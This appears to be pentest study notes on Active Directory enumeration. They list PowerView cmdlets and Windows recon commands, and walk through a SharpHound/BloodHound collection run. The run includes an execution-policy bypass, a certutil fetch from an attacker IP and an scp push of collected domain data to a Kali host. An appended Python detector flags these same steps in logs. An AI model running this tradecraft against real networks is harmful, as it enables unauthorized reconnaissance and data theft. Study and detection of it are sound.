AD Enumeration Manual & Automated
🧠 What is the Enumeration Process
Before starting enumeration, make sure to bypass the PowerShell execution policy with `powershell -ep bypass`. Then you will be able to import scripts and execute them.
System Enumeration
PowerView Enumeration
User Enumeration
- Searching for every user's details: `Get-NetUser`
- Filtering to the common names only: `Get-NetUser | select cn`
- Information about a specific user: `Get-NetUser -UserName pawan`
- Currently logged-in users: `Invoke-UserHunter`
Domain Enumeration
- Domain info: `Get-NetDomain`
- Domain controller info: `Get-NetDomainController`
Manual OS and Active Directory Enumeration - Windows
| Enumeration Area | Purpose | Command |
|---|---|---|
| OS Version | Basic version | `ver` |
| OS Version | Detailed version & build | `systeminfo \| findstr /B /C:"OS"` |
| OS Version | Windows edition | `systeminfo \| findstr /C:"OS Name"` |
| OS Version | Service pack | `systeminfo \| findstr /C:"Service Pack"` |
| OS Version | Architecture | `echo %PROCESSOR_ARCHITECTURE%` |
| OS Version | Boot time | `systeminfo \| find "System Boot Time"` |
| OS Version | Uptime | `net statistics workstation` |
| OS Version | BIOS info | `wmic bios get manufacturer,version` |
| OS Version | Hardware model | `wmic computersystem get model,name` |
| Hostname & Domain | Hostname | `hostname` |
| Hostname & Domain | Domain/Workgroup | `systeminfo \| findstr /C:"Domain"` |
| Hostname & Domain | Domain joined | `net config workstation` |
| Hostname & Domain | Computer name | `echo %COMPUTERNAME%` |
| Hostname & Domain | Domain name | `echo %USERDOMAIN%` |
| User Info | Current user | `whoami` |
| User Info | Privileges | `whoami /priv` |
| User Info | Groups | `whoami /groups` |
| User Info | Full user detail | `whoami /all` |
| User Info | All local users | `net users` |
| Patch Info | Installed patches | `wmic qfe list brief /format:table` |
| Patch Info | Hotfixes (PowerShell) | `Get-HotFix` |
| System Configs | Services | `sc query` or `net start` |
| System Configs | Running processes | `tasklist` |
| System Configs | Scheduled tasks | `schtasks /query /fo LIST /v` |
| System Configs | Environment variables | `set` |
| Network & Sessions | IP configuration | `ipconfig /all` |
| Network & Sessions | Logged-in users | `qwinsta` or `query user` |
| Network & Sessions | Shared resources | `net share` |
| Active Directory Enumeration | Computer info | `Get-NetComputer` (via PowerView) |
| Active Directory Enumeration | List domain users | `Get-NetUser` (via PowerView) |
| Active Directory Enumeration | List groups in AD | `Get-NetGroup` (via PowerView) |
| Active Directory Enumeration | Domain trusts | `Get-NetDomainTrust` (via PowerView) |
| Active Directory Enumeration | Domain info | `Get-NetDomain` (via PowerView) |
| Active Directory Enumeration | Find domain controllers | `Get-NetDomainController` (via PowerView) |
| Active Directory Enumeration | Get Active Directory sites | `Get-NetADSite` (via PowerView) |
| Active Directory Enumeration | List domain controllers | `Get-ADDomainController -Filter *` |
| Active Directory Enumeration | Check for unconstrained delegation | `Get-NetUnconstrainedDelegation` (via PowerView) |
| Active Directory Enumeration | Kerberos ticket information | `Get-Ticket` (via PowerView) |
| Active Directory Enumeration | Active Directory shares | `Get-NetShare` (via PowerView) |
| Active Directory Enumeration | Enumeration of GPOs | `Get-NetGPO` (via PowerView) |
Automated Enumeration
Using SharpHound to collect data and BloodHound to analyze it
Using SharpHound
Step 1: Download SharpHound onto the Windows machine.
`certutil -urlcache -split -f http://192.168.45.222/SharpHound.ps1`
Step 2: Import SharpHound into the PowerShell session.
`Import-Module .\Sharphound.ps1`
Step 3: Invoke BloodHound for data collection.
`Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\pawan\Desktop\ -OutputPrefix "Pawan_audit"`
Setting `-CollectionMethod` to `All` collects everything; the other collection methods are listed by `Get-Help Invoke-BloodHound`.
Step 4: Get the audit zip file to your Kali machine.
If no other transfer option is available, enable SSH on Kali and push the file with scp:
`scp "C:\path\to\local\file.txt" kali@<Kali_IP_Address>:/home/kali/Documents/directory/`
Step 5: Start neo4j on Kali.
`sudo neo4j start`
Step 6: Start BloodHound.
`sudo bloodhound`
Step 7: Upload your audit zip file into BloodHound and analyze the result.
Check the version compatibility of the SharpHound and BloodHound builds you use: SharpHound version 2.0.0 is compatible with BloodHound version 4.3.1. Alternatively, use the SharpHound collector bundled with the installed BloodHound under `/usr/lib/bloodhound/resources/app/Collectors`.
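As an added example (not part of the original notes), here is a small Python triage script that scans PowerShell script block (event 4104) and process creation (event 4688) telemetry for the PowerView cmdlets and the SharpHound steps walked through above, so a defender can see what a collection run like this leaves behind in the logs. The event field names and the sample events are constructed for illustration and are a simplification, not the real Windows event schema.

```python
import re

# Rules cover the exact steps on this page: the execution-policy bypass,
# the PowerView cmdlets, the certutil download, the SharpHound import and
# the Invoke-BloodHound collection. (rule name, regex, severity)
RULES = [
    ("execpolicy-bypass", r"powershell(\.exe)?\s.*-(ep|ExecutionPolicy)\s+bypass", "low"),
    ("powerview-cmdlet",
     r"\b(Get-Net(User|Domain|DomainController|Computer|Group|Share|GPO|DomainTrust)"
     r"|Invoke-UserHunter)\b", "medium"),
    ("certutil-download", r"certutil\b.*-urlcache\b.*-split\b.*-f\s+https?://", "medium"),
    ("sharphound-import", r"Import-Module\s+\S*Sharphound\.ps1", "high"),
    ("sharphound-collect", r"Invoke-BloodHound\b.*-CollectionMethod\s+All\b", "high"),
]

# Assumed (simplified) event shape: id = Windows event ID, text = ScriptBlockText
# for 4104 or CommandLine for 4688, plus host and user for attribution.
def scan_events(events):
    """Return one finding per (event, rule) match, in input order."""
    findings = []
    for ev in events:
        for name, pattern, severity in RULES:
            m = re.search(pattern, ev["text"], re.IGNORECASE)
            if m:
                findings.append({"event_id": ev["id"], "host": ev["host"], "user": ev["user"],
                                 "rule": name, "severity": severity, "match": m.group(0)})
    return findings

def summarize(findings):
    """Count findings per rule so triage can see which stage of the run was reached."""
    counts = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts

# Constructed sample telemetry mirroring the steps on this page; not real logs.
SAMPLE_EVENTS = [
    {"id": 4688, "host": "WS01", "user": "CORP\\pawan", "text": "powershell.exe -ep bypass"},
    {"id": 4104, "host": "WS01", "user": "CORP\\pawan", "text": "Get-NetUser | select cn"},
    {"id": 4104, "host": "WS01", "user": "CORP\\pawan", "text": "Invoke-UserHunter"},
    {"id": 4688, "host": "WS01", "user": "CORP\\pawan",
     "text": "certutil -urlcache -split -f http://192.168.45.222/SharpHound.ps1"},
    {"id": 4104, "host": "WS01", "user": "CORP\\pawan", "text": "Import-Module .\\Sharphound.ps1"},
    {"id": 4104, "host": "WS01", "user": "CORP\\pawan",
     "text": "Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\\Users\\pawan\\Desktop\\ -OutputPrefix \"Pawan_audit\""},
    {"id": 4104, "host": "WS02", "user": "CORP\\svc_backup", "text": "Get-ChildItem C:\\Backups | Select-Object Name"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['user']} event {f['event_id']}: {f['rule']} -> {f['match']}")
    print(summarize(scan_events(SAMPLE_EVENTS)))
```

Script block logging must be enabled for 4104 events to exist at all, and the benign WS02 event shows the rules ignore ordinary pipeline use.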